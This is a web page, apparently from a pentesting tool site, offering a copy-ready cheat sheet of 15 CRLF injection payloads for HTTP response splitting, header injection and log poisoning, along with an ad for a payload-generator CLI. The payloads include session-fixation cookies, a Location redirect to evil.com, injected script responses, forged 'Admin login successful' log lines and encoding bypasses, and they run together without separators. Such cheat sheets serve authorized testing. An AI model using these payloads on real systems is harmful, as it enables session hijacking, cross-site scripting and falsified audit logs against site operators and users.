CRLF injection payloads for HTTP response splitting, header injection, and log poisoning. (15 payloads)
%0d%0aX-Injected: true%0d%0aSet-Cookie: session=attacker%0d%0aLocation: https://evil.com%0aX-Forwarded-For: 127.0.0.1\r\nX-Injected: true%0d%0a%0d%0a<html><script>alert(1)</script></html>%0d%0aContent-Length: 0%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert(1)</script>%0d%0a[INFO] Admin login successful%0d%0a[2024-01-01] Authorized access granted%0d%0a%0a%0d%E5%98%8A%E5%98%8D%25%30%61%%0d0aLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 15 CRLF payloads for testing CRLF Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or open the CRLF Injection generator to build customized CRLF variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all CRLF payloads are completely free, with no account required. Everything runs in your browser.